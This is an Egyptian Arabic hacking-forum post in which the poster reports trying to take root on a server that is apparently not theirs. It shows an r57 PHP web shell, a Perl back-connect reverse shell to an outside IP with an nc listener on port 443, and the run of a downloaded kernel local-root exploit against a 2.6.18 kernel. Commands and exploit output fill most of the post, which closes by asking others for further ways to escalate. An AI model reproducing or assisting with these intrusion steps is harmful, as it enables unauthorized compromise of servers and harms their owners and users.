صباح الخير يا اصدقاء
للاسف يبدو ان السيرفر اللي انا عليه عنيد : (
اولا دي المشاكل اللي قبلتني
1- اللوكال اللي معايا تقريبا مش لاصدار كرنل السيرفر لانه مش شغال معايا
ده رابط اللوكال اللي انا حملته : http://www.mediafire.com/?dbquci8jq0bfv2k
وده اصدار كرنال السيرفر :
كود PHP:
Linux rs2.----.com 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010 x86_64
مبدئيا انا لما بشتغل بشيل r57 الانجليزي او المعرب او المعدل زي سنيبر وغيره لا استطيع عمل اتصال عكسي ولما بضغط connect بيظهر خطأ
كود PHP:
خطاء ! لايمكن الكتابة على هذا الملف
انا نزلت شيل جديد لكنه اشتغل معايا ونجحت في عمل اتصال عكسي على البورت 443
من خلال الامر nc -vlp 443
ولما بضغط اتصال بتظهر في الشيل الرسالة دي :
كود PHP:
mwezi 4539 0.0 0.0 27448 2544 ? S 06:29 0:00 perl /tmp/bc.pl xx.238.xx.2 443
mwezi 4563 0.0 0.0 10796 1068 ? S 06:29 0:00 sh -c ps aux | grep bc.pl
mwezi 4565 0.0 0.0 6024 580 ? S 06:29 0:00 grep bc.pl
وبيظهر في cmd الرسالة دي :
كود PHP:
C:\shell>nc -vlp 443
listening on [any] 443 ...
connect to [192.168.1.84] from rs2.-----.com [xx.127.xx.52] 39690
sh: no job control in this shell
sh-3.2$
وعلشان اتأكد انه تم الاتصال بنجاح بكتب الامر id بيظهر الصلاحية يوزر عادي
كود PHP:
uid=2808(mwezi) gid=2793(mwezi) groups=2793(mwezi)
بعدين رفعت اللوكال على السيرفر في نفس مسار الشيل وبعدين فكيت ضغطه
لكن لما حاولت اغير تصريح اللوكال ل 777 من ال cmd عن طريق الامر chmod 777 local ظهرت الرسالة دي :
كود PHP:
sh: /bin/chmod: Permission denied
طبعا لما ظهرت رسالة عدم امتلاك الصلاحية لتنفيذ الامر دخلت الشيل وغيرت تصريح اللوكل يدوي ل 777
ورجعت لل cmd وحاولت اكتب امر تشغيل اللوكل
ظهرتلي الرسالة دي :
كود PHP:
sh-3.2$ ./local
?[32mAc1dB1tCh3z ?[0mVS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.18-194.26.1.el5
??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d
$$$ L00k1ng f0r kn0wn t4rg3tz..
$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...
$$$ selinux_ops->ffffffff80327ac0
$$$ dummy_security_ops->ffffffff804b9540
$$$ capability_ops->ffffffff80329380
$$$ selinux_enforcing->ffffffff804bc2a0
$$$ audit_enabled->ffffffff804a7124
$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d
$$$ Prepare: m0rn1ng w0rk0ut b1tch3z
$$$ Us1ng st4nd4rd s3ash3llz
$$$ 0p3n1ng th3 m4giq p0rt4l
!!! y0u fuq1ng f41l. g3t th3 fuq 0ut!
sh-3.2$
لاحظ في نهاية الرسالة مكتوب : y0u fuq1ng f41l. g3t th3 fuq 0ut!
مش عارف دي رسالة حماية من صاحب السيرفر ولا دي رسالة عادية بتفيد فشل تنفذ اللوكل
المهم انا حاولت اتجاهل الرسالة وجربت اشوف الصلاحية من خلال الامر id
لكن للاسف لسه مازالت يوزر عادي
كود PHP:
uid=2808(mwezi) gid=2793(mwezi) groups=2793(mwezi)
طبعا زي ما شفتوا كل المحاولات فشلت : (
هنعمل ايه دلوقتي مع السيرفر العنيد ده
^_^
la;gm yvdJJJJJfm td ho` v,,j lk sdvtv ukdJJJ]